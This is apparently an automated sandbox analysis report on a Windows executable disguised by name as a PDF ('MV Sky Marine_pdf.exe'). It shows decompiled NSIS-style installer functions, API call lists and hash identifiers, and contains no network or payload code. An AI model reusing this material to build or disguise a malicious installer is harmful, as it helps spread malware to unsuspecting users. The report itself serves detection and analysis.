                                                                                                  							SendMessageA(_a4, 0x420, _t315, _t283);
                                                                                                  							_a12 = 1;
                                                                                                  							_a16 = _t315;
                                                                                                  							_a8 = 0x40f;
                                                                                                  							goto L56;
                                                                                                  						}
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					 *0x7a2800 = _a4;
                                                                                                  					_t285 = 2;
                                                                                                  					_v28 = 0;
                                                                                                  					_v16 = _t285;
                                                                                                  					 *0x79ed94 = GlobalAlloc(0x40,  *0x7a27cc << 2);
                                                                                                  					_t250 = LoadBitmapA( *0x7a27a0, 0x6e);
                                                                                                  					 *0x79ed88 =  *0x79ed88 | 0xffffffff;
                                                                                                  					_v24 = _t250;
                                                                                                  					 *0x79ed90 = SetWindowLongA(_v8, 0xfffffffc, E00404F60);
                                                                                                  					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                                  					 *0x79ed7c = _t252;
                                                                                                  					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                                                                  					SendMessageA(_v8, 0x1109, _t285,  *0x79ed7c);
                                                                                                  					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                                  						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                                                                  					}
                                                                                                  					DeleteObject(_v24);
                                                                                                  					_t286 = 0;
                                                                                                  					do {
                                                                                                  						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                                                                  						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                                                                                  							if(_t286 != 0x20) {
                                                                                                  								_v16 = _t315;
                                                                                                  							}
                                                                                                  							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405D46(_t286, _t315, _t320, _t315, _t258)), _t286);
                                                                                                  						}
                                                                                                  						_t286 = _t286 + 1;
                                                                                                  					} while (_t286 < 0x21);
                                                                                                  					_t317 = _a16;
                                                                                                  					_t287 = _v16;
                                                                                                  					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                                                                  					_push(0x15);
                                                                                                  					E00403FE0(_a4);
                                                                                                  					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                                                                  					_push(0x16);
                                                                                                  					E00403FE0(_a4);
                                                                                                  					_t318 = 0;
                                                                                                  					_t288 = 0;
                                                                                                  					if( *0x7a27cc <= 0) {
                                                                                                  						L19:
                                                                                                  						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                                                  						goto L20;
                                                                                                  					} else {
                                                                                                  						_t311 = _v32 + 8;
                                                                                                  						_v24 = _t311;
                                                                                                  						do {
                                                                                                  							_t268 = _t311 + 0x10;
                                                                                                  							if( *_t268 != 0) {
                                                                                                  								_v60 = _t268;
                                                                                                  								_t269 =  *_t311;
                                                                                                  								_t302 = 0x20;
                                                                                                  								_v84 = _t288;
                                                                                                  								_v80 = 0xffff0002;
                                                                                                  								_v76 = 0xd;
                                                                                                  								_v64 = _t302;
                                                                                                  								_v40 = _t318;
                                                                                                  								_v68 = _t269 & _t302;
                                                                                                  								if((_t269 & 0x00000002) == 0) {
                                                                                                  									if((_t269 & 0x00000004) == 0) {
                                                                                                  										 *( *0x79ed94 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                                  									} else {
                                                                                                  										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                                                                  									}
                                                                                                  								} else {
                                                                                                  									_v76 = 0x4d;
                                                                                                  									_v44 = 1;
                                                                                                  									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                                  									_v28 = 1;
                                                                                                  									 *( *0x79ed94 + _t318 * 4) = _t274;
                                                                                                  									_t288 =  *( *0x79ed94 + _t318 * 4);
                                                                                                  								}
                                                                                                  							}
                                                                                                  							_t318 = _t318 + 1;
                                                                                                  							_t311 = _v24 + 0x418;
                                                                                                  							_v24 = _t311;
                                                                                                  						} while (_t318 <  *0x7a27cc);
                                                                                                  						if(_v28 != 0) {
                                                                                                  							L20:
                                                                                                  							if(_v16 != 0) {
                                                                                                  								E00404015(_v8);
                                                                                                  								_t280 = _v32;
                                                                                                  								_t315 = 0;
                                                                                                  								goto L23;
                                                                                                  							} else {
                                                                                                  								ShowWindow(_v12, 5);
                                                                                                  								E00404015(_v12);
                                                                                                  								L89:
                                                                                                  								return E00404047(_a8, _a12, _a16);
                                                                                                  							}
                                                                                                  						}
                                                                                                  						goto L19;
                                                                                                  					}
                                                                                                  				}
                                                                                                  			}
                                                                                                  0x00404b30
                                                                                                  0x00404b37
                                                                                                  0x00404b3f
                                                                                                  0x00404b3f
                                                                                                  0x00404b0a
                                                                                                  0x00404b75
                                                                                                  0x00404b76
                                                                                                  0x00404b82
                                                                                                  0x00404b82
                                                                                                  0x00404b8f
                                                                                                  0x00404baa
                                                                                                  0x00404bae
                                                                                                  0x00404bcb
                                                                                                  0x00404bd0
                                                                                                  0x00404bd3
                                                                                                  0x00000000
                                                                                                  0x00404bb0
                                                                                                  0x00404bb5
                                                                                                  0x00404bbe
                                                                                                  0x00404f4b
                                                                                                  0x00404f5d
                                                                                                  0x00404f5d
                                                                                                  0x00404bae
                                                                                                  0x00000000
                                                                                                  0x00404b8f
                                                                                                  0x00404ac7

                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32 ref: 00404976
                                                                                                  • GetDlgItem.USER32 ref: 00404983
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004049CF
                                                                                                  • LoadBitmapA.USER32 ref: 004049E2
                                                                                                  • SetWindowLongA.USER32 ref: 004049FC
                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A10
                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A24
                                                                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404A39
                                                                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A45
                                                                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A57
                                                                                                  • DeleteObject.GDI32(?), ref: 00404A5C
                                                                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A87
                                                                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A93
                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B28
                                                                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B53
                                                                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B67
                                                                                                  • GetWindowLongA.USER32 ref: 00404B96
                                                                                                  • SetWindowLongA.USER32 ref: 00404BA4
                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404BB5
                                                                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404CB8
                                                                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D1D
                                                                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D32
                                                                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D56
                                                                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D7C
                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404D91
                                                                                                  • GlobalFree.KERNEL32 ref: 00404DA1
                                                                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E11
                                                                                                  • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404EBA
                                                                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EC9
                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EE9
                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00404F37
                                                                                                  • GetDlgItem.USER32 ref: 00404F42
                                                                                                  • ShowWindow.USER32(00000000), ref: 00404F49
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                  • String ID: $M$N
                                                                                                  • API String ID: 1638840714-813528018
                                                                                                  • Opcode ID: be7540e4cc6a151ea8713d31a9eed4cf9da7dc34b27a5e75a40caa79e02f15b3
                                                                                                  • Instruction ID: b39e9636f5aaab15ba5d0f8970ea7500dddba046e98d1044c397c9b2f2ac7f8d
                                                                                                  • Opcode Fuzzy Hash: be7540e4cc6a151ea8713d31a9eed4cf9da7dc34b27a5e75a40caa79e02f15b3
                                                                                                  • Instruction Fuzzy Hash: 74028CB0900209AFEB11CF55DC85AAE7BB5FB84314F10817AF611BA2E1D7799E42CF58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 78%
                                                                                                  			E0040441E(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                  				signed int _v8;
                                                                                                  				signed int _v12;
                                                                                                  				long _v16;
                                                                                                  				long _v20;
                                                                                                  				long _v24;
                                                                                                  				char _v28;
                                                                                                  				intOrPtr _v32;
                                                                                                  				long _v36;
                                                                                                  				char _v40;
                                                                                                  				unsigned int _v44;
                                                                                                  				signed int _v48;
                                                                                                  				CHAR* _v56;
                                                                                                  				intOrPtr _v60;
                                                                                                  				intOrPtr _v64;
                                                                                                  				intOrPtr _v68;
                                                                                                  				CHAR* _v72;
                                                                                                  				void _v76;
                                                                                                  				struct HWND__* _v80;
                                                                                                  				void* __ebx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				intOrPtr _t82;
                                                                                                  				long _t87;
                                                                                                  				signed char* _t89;
                                                                                                  				void* _t95;
                                                                                                  				signed int _t96;
                                                                                                  				int _t109;
                                                                                                  				signed short _t114;
                                                                                                  				signed int _t118;
                                                                                                  				struct HWND__** _t122;
                                                                                                  				intOrPtr* _t138;
                                                                                                  				CHAR* _t146;
                                                                                                  				intOrPtr _t147;
                                                                                                  				unsigned int _t150;
                                                                                                  				signed int _t152;
                                                                                                  				unsigned int _t156;
                                                                                                  				signed int _t158;
                                                                                                  				signed int* _t159;
                                                                                                  				struct HWND__* _t165;
                                                                                                  				struct HWND__* _t166;
                                                                                                  				int _t168;
                                                                                                  				unsigned int _t197;
                                                                                                  
                                                                                                  				_t156 = __edx;
                                                                                                  				_t82 =  *0x79e570;
                                                                                                  				_v32 = _t82;
                                                                                                  				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x7a3000;
                                                                                                  				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                                  				if(_a8 == 0x40b) {
                                                                                                  					E004055C9(0x3fb, _t146);
                                                                                                  					E00405F86(_t146);
                                                                                                  				}
                                                                                                  				_t166 = _a4;
                                                                                                  				if(_a8 != 0x110) {
                                                                                                  					L8:
                                                                                                  					if(_a8 != 0x111) {
                                                                                                  						L20:
                                                                                                  						if(_a8 == 0x40f) {
                                                                                                  							L22:
                                                                                                  							_v8 = _v8 & 0x00000000;
                                                                                                  							_v12 = _v12 & 0x00000000;
                                                                                                  							E004055C9(0x3fb, _t146);
                                                                                                  							if(E004058F8(_t185, _t146) == 0) {
                                                                                                  								_v8 = 1;
                                                                                                  							}
                                                                                                  							E00405D24(0x79dd68, _t146);
                                                                                                  							_t87 = E004060B4(1);
                                                                                                  							_v16 = _t87;
                                                                                                  							if(_t87 == 0) {
                                                                                                  								L30:
                                                                                                  								E00405D24(0x79dd68, _t146);
                                                                                                  								_t89 = E004058AB(0x79dd68);
                                                                                                  								_t158 = 0;
                                                                                                  								if(_t89 != 0) {
                                                                                                  									 *_t89 =  *_t89 & 0x00000000;
                                                                                                  								}
                                                                                                  								if(GetDiskFreeSpaceA(0x79dd68,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                                  									goto L35;
                                                                                                  								} else {
                                                                                                  									_t168 = 0x400;
                                                                                                  									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                                  									asm("cdq");
                                                                                                  									_v48 = _t109;
                                                                                                  									_v44 = _t156;
                                                                                                  									_v12 = 1;
                                                                                                  									goto L36;
                                                                                                  								}
                                                                                                  							} else {
                                                                                                  								_t159 = 0;
                                                                                                  								if(0 == 0x79dd68) {
                                                                                                  									goto L30;
                                                                                                  								} else {
                                                                                                  									goto L26;
                                                                                                  								}
                                                                                                  								while(1) {
                                                                                                  									L26:
                                                                                                  									_t114 = _v16(0x79dd68,  &_v48,  &_v28,  &_v40);
                                                                                                  									if(_t114 != 0) {
                                                                                                  										break;
                                                                                                  									}
                                                                                                  									if(_t159 != 0) {
                                                                                                  										 *_t159 =  *_t159 & _t114;
                                                                                                  									}
                                                                                                  									_t159 = E0040585E(0x79dd68) - 1;
                                                                                                  									 *_t159 = 0x5c;
                                                                                                  									if(_t159 != 0x79dd68) {
                                                                                                  										continue;
                                                                                                  									} else {
                                                                                                  										goto L30;
                                                                                                  									}
                                                                                                  								}
                                                                                                  								_t150 = _v44;
                                                                                                  								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                                  								_v44 = _t150 >> 0xa;
                                                                                                  								_v12 = 1;
                                                                                                  								_t158 = 0;
                                                                                                  								__eflags = 0;
                                                                                                  								L35:
                                                                                                  								_t168 = 0x400;
                                                                                                  								L36:
                                                                                                  								_t95 = E004048B2(5);
                                                                                                  								if(_v12 != _t158) {
                                                                                                  									_t197 = _v44;
                                                                                                  									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                                  										_v8 = 2;
                                                                                                  									}
                                                                                                  								}
                                                                                                  								_t147 =  *0x7a1f7c; // 0x891203
                                                                                                  								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                                                                  									E0040489A(0x3ff, 0xfffffffb, _t95);
                                                                                                  									if(_v12 == _t158) {
                                                                                                  										SetDlgItemTextA(_a4, _t168, 0x79dd58);
                                                                                                  									} else {
                                                                                                  										E004047D5(_t168, 0xfffffffc, _v48, _v44);
                                                                                                  									}
                                                                                                  								}
                                                                                                  								_t96 = _v8;
                                                                                                  								 *0x7a2844 = _t96;
                                                                                                  								if(_t96 == _t158) {
                                                                                                  									_v8 = E0040140B(7);
                                                                                                  								}
                                                                                                  								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                                                                  									_v8 = _t158;
                                                                                                  								}
                                                                                                  								E00404002(0 | _v8 == _t158);
                                                                                                  								if(_v8 == _t158 &&  *0x79ed8c == _t158) {
                                                                                                  									E004043B3();
                                                                                                  								}
                                                                                                  								 *0x79ed8c = _t158;
                                                                                                  								goto L53;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						_t185 = _a8 - 0x405;
                                                                                                  						if(_a8 != 0x405) {
                                                                                                  							goto L53;
                                                                                                  						}
                                                                                                  						goto L22;
                                                                                                  					}
                                                                                                  					_t118 = _a12 & 0x0000ffff;
                                                                                                  					if(_t118 != 0x3fb) {
                                                                                                  						L12:
                                                                                                  						if(_t118 == 0x3e9) {
                                                                                                  							_t152 = 7;
                                                                                                  							memset( &_v76, 0, _t152 << 2);
                                                                                                  							_v80 = _t166;
                                                                                                  							_v72 = 0x79eda0;
                                                                                                  							_v60 = E0040476F;
                                                                                                  							_v56 = _t146;
                                                                                                  							_v68 = E00405D46(_t146, 0x79eda0, _t166, 0x79e170, _v12);
                                                                                                  							_t122 =  &_v80;
                                                                                                  							_v64 = 0x41;
                                                                                                  							__imp__SHBrowseForFolderA(_t122);
                                                                                                  							if(_t122 == 0) {
                                                                                                  								_a8 = 0x40f;
                                                                                                  							} else {
                                                                                                  								__imp__CoTaskMemFree(_t122);
                                                                                                  								E00405817(_t146);
                                                                                                  								_t125 =  *((intOrPtr*)( *0x7a27b0 + 0x11c));
                                                                                                  								if( *((intOrPtr*)( *0x7a27b0 + 0x11c)) != 0 && _t146 == 0x7a8400) {
                                                                                                  									E00405D46(_t146, 0x79eda0, _t166, 0, _t125);
                                                                                                  									if(lstrcmpiA(0x7a1740, 0x79eda0) != 0) {
                                                                                                  										lstrcatA(_t146, 0x7a1740);
                                                                                                  									}
                                                                                                  								}
                                                                                                  								 *0x79ed8c =  *0x79ed8c + 1;
                                                                                                  								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                                                                  							}
                                                                                                  						}
                                                                                                  						goto L20;
                                                                                                  					}
                                                                                                  					if(_a12 >> 0x10 != 0x300) {
                                                                                                  						goto L53;
                                                                                                  					}
                                                                                                  					_a8 = 0x40f;
                                                                                                  					goto L12;
                                                                                                  				} else {
                                                                                                  					_t165 = GetDlgItem(_t166, 0x3fb);
                                                                                                  					if(E00405884(_t146) != 0 && E004058AB(_t146) == 0) {
                                                                                                  						E00405817(_t146);
                                                                                                  					}
                                                                                                  					 *0x7a1f78 = _t166;
                                                                                                  					SetWindowTextA(_t165, _t146);
                                                                                                  					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                  					_push(1);
                                                                                                  					E00403FE0(_t166);
                                                                                                  					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                  					_push(0x14);
                                                                                                  					E00403FE0(_t166);
                                                                                                  					E00404015(_t165);
                                                                                                  					_t138 = E004060B4(0xa);
                                                                                                  					if(_t138 == 0) {
                                                                                                  						L53:
                                                                                                  						return E00404047(_a8, _a12, _a16);
                                                                                                  					} else {
                                                                                                  						 *_t138(_t165, 1);
                                                                                                  						goto L8;
                                                                                                  					}
                                                                                                  				}
                                                                                                  			}


                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32 ref: 0040446D
                                                                                                  • SetWindowTextA.USER32(00000000,?), ref: 00404497
                                                                                                  • SHBrowseForFolderA.SHELL32(?,0079E170,?), ref: 00404548
                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404553
                                                                                                  • lstrcmpiA.KERNEL32(HfkcdoekxlzOjbt,0079EDA0,00000000,?,?), ref: 00404585
                                                                                                  • lstrcatA.KERNEL32(?,HfkcdoekxlzOjbt), ref: 00404591
                                                                                                  • SetDlgItemTextA.USER32 ref: 004045A3
                                                                                                    • Part of subcall function 004055C9: GetDlgItemTextA.USER32 ref: 004055DC
                                                                                                    • Part of subcall function 00405F86: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040324A,C:\Users\user\AppData\Local\Temp\,?,004033FD), ref: 00405FDE
                                                                                                    • Part of subcall function 00405F86: CharNextA.USER32(?,?,?,00000000), ref: 00405FEB
                                                                                                    • Part of subcall function 00405F86: CharNextA.USER32(?,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040324A,C:\Users\user\AppData\Local\Temp\,?,004033FD), ref: 00405FF0
                                                                                                    • Part of subcall function 00405F86: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040324A,C:\Users\user\AppData\Local\Temp\,?,004033FD), ref: 00406000
                                                                                                  • GetDiskFreeSpaceA.KERNEL32(0079DD68,?,?,0000040F,?,0079DD68,0079DD68,?,00000001,0079DD68,?,?,000003FB,?), ref: 00404661
                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040467C
                                                                                                    • Part of subcall function 004047D5: lstrlenA.KERNEL32(0079EDA0,0079EDA0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046F0,000000DF,00000000,00000400,?), ref: 00404873
                                                                                                    • Part of subcall function 004047D5: wsprintfA.USER32 ref: 0040487B
                                                                                                    • Part of subcall function 004047D5: SetDlgItemTextA.USER32 ref: 0040488E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                   • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                  • String ID: A$HfkcdoekxlzOjbt
                                                                                                  • API String ID: 2624150263-3645444431
                                                                                                  • Opcode ID: a35848822b66a5b72b566826822699703d6d74f2a6479d0dc0bae6a048424868
                                                                                                  • Instruction ID: 2eb8aaa2efd78124c2d111ac58df3133dc9bbfb09b7a0f1b1767b6d074ea69be
                                                                                                  • Opcode Fuzzy Hash: a35848822b66a5b72b566826822699703d6d74f2a6479d0dc0bae6a048424868
                                                                                                  • Instruction Fuzzy Hash: 05A15DB1900609ABDB11AFA5CC45AAF77B8EF85314F10843BF711B62D1D77C8A418F69
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 74%
                                                                                                  			E00402053() {
                                                                                                  				void* _t44;
                                                                                                  				intOrPtr* _t48;
                                                                                                  				intOrPtr* _t50;
                                                                                                  				intOrPtr* _t52;
                                                                                                  				intOrPtr* _t54;
                                                                                                  				signed int _t58;
                                                                                                  				intOrPtr* _t59;
                                                                                                  				intOrPtr* _t62;
                                                                                                  				intOrPtr* _t64;
                                                                                                  				intOrPtr* _t66;
                                                                                                  				intOrPtr* _t69;
                                                                                                  				intOrPtr* _t71;
                                                                                                  				int _t75;
                                                                                                  				signed int _t81;
                                                                                                  				intOrPtr* _t88;
                                                                                                  				void* _t95;
                                                                                                  				void* _t96;
                                                                                                  				void* _t100;
                                                                                                  
                                                                                                  				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
                                                                                                  				_t96 = E00402A29(0xffffffdf);
                                                                                                  				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
                                                                                                  				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
                                                                                                  				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
                                                                                                  				if(E00405884(_t96) == 0) {
                                                                                                  					E00402A29(0x21);
                                                                                                  				}
                                                                                                  				_t44 = _t100 + 8;
                                                                                                  				__imp__CoCreateInstance(0x4073f8, _t75, 1, 0x4073e8, _t44);
                                                                                                  				if(_t44 < _t75) {
                                                                                                  					L13:
                                                                                                  					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                                                                  					_push(0xfffffff0);
                                                                                                  				} else {
                                                                                                  					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                                                                  					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407408, _t100 - 8);
                                                                                                  					if(_t95 >= _t75) {
                                                                                                  						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                                                                  						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                                                                  						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                                                                  						 *((intOrPtr*)( *_t54 + 0x24))(_t54, 0x7a8800);
                                                                                                  						_t81 =  *(_t100 - 0x18);
                                                                                                  						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                                                                  						if(_t58 != 0) {
                                                                                                  							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                                                                  							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                                                                  							_t81 =  *(_t100 - 0x18);
                                                                                                  						}
                                                                                                  						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                                                                  						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
                                                                                                  							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                                                                  							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
                                                                                                  						}
                                                                                                  						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                                                                  						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
                                                                                                  						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                                                                  						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
                                                                                                  						if(_t95 >= _t75) {
                                                                                                  							_t95 = 0x80004005;
                                                                                                  							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409428, 0x400) != 0) {
                                                                                                  								_t69 =  *((intOrPtr*)(_t100 - 8));
                                                                                                  								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409428, 1);
                                                                                                  							}
                                                                                                  						}
                                                                                                  						_t66 =  *((intOrPtr*)(_t100 - 8));
                                                                                                  						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                                                                  					}
                                                                                                  					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                                                                  					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                                                                  					if(_t95 >= _t75) {
                                                                                                  						_push(0xfffffff4);
                                                                                                  					} else {
                                                                                                  						goto L13;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				E00401423();
                                                                                                  				 *0x7a2828 =  *0x7a2828 +  *((intOrPtr*)(_t100 - 4));
                                                                                                  				return 0;
                                                                                                  			}


                                                                                                  APIs
                                                                                                  • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409428,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                   • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp
                                                                                                   • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 123533781-0
                                                                                                  • Opcode ID: 6c085ce4173e472293b98a60e83fc08fb9dfcdb600c22de38a5f30155ad76b43
                                                                                                  • Instruction ID: 404e50bc5d71950e3e8af582092634c837c43b9f218531fc8d83bde72b32b076
                                                                                                  • Opcode Fuzzy Hash: 6c085ce4173e472293b98a60e83fc08fb9dfcdb600c22de38a5f30155ad76b43
                                                                                                  • Instruction Fuzzy Hash: 83416D75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169FA05EB2D1CA799C41CB94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 39%
                                                                                                  			E00402671(char __ebx, CHAR* __edi, char* __esi) {
                                                                                                  				void* _t19;
                                                                                                  
                                                                                                  				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
                                                                                                  					E00405C82(__edi, _t6);
                                                                                                  					_push(_t19 - 0x170);
                                                                                                  					_push(__esi);
                                                                                                  					E00405D24();
                                                                                                  				} else {
                                                                                                  					 *((char*)(__edi)) = __ebx;
                                                                                                  					 *__esi = __ebx;
